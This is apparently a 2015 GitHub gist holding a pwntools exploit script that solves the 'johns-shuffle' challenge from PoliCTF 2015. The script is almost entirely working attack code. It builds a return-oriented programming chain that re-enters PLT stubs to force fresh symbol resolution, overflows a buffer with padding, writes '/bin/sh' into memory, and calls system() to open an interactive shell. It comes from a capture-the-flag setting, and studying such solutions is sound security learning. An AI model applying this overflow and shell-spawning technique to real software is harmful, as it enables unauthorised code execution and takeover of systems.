@kokjo
Created July 14, 2015 09:06
Solution for johns-shuffle from polictf 2015
from pwn import *

e = ELF("./johns-shuffle")
rop = ROP(e)
command = b"/bin/sh"

# Bypass the shuffling by forcing the dynamic linker to look the symbols up again:
# the challenge shuffles the already-resolved PLT/GOT entries, so entering a PLT
# stub at +6 skips its `jmp *GOT` slot and lands on `push <reloc index>; jmp PLT0`,
# which makes the lazy resolver resolve the symbol from scratch and call the real function.
rop.call(e.plt["read"] + 6, [0, e.bss(), len(command) + 1])   # read(0, bss, 8)
rop.call(e.plt["system"] + 6, [e.bss()])                        # system(bss)

r = process("./johns-shuffle")
#r = remote('shuffle.polictf.it', 80)
# "exit", 28 bytes of padding, then the chain. rop.chain() returns the raw chain
# bytes on both Python 2 and Python 3 pwntools (str(rop) is a readable dump on Python 3).
r.sendlineafter(b"mistake..\n", b"exit" + b"A" * 28 + rop.chain())
# Deliver the NUL-terminated command string into .bss for the read() call above.
r.sendafter(b"\n", command + b"\x00")
r.interactive()